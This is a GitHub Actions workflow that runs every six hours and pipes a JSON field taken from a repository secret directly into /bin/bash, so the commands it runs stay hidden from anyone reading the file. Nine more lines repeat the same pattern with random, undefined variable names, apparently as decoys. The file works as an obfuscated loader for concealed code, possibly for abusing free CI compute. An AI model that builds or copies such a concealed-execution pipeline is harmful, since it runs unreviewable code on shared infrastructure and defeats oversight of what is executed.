name: panfuming1199
on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: panfuming1199
        env:
          z72: ${{ secrets.z72 }}
        run: |
          echo $z72 | jq -r .vm81 | /bin/bash
          echo $w4616 | jq -r .t7537 | /bin/bash
          echo $pxaaq7048 | jq -r .ju657 | /bin/bash
          echo $l269 | jq -r .bbvqx6766 | /bin/bash
          echo $yo8 | jq -r .ginat12 | /bin/bash
          echo $wio8378 | jq -r .roajk140 | /bin/bash
          echo $z01272 | jq -r .weiwb95607 | /bin/bash
          echo $d5923 | jq -r .qcbu19 | /bin/bash
          echo $tgwq9 | jq -r .h6 | /bin/bash
          echo $kszpt7323 | jq -r .sox76529 | /bin/bash

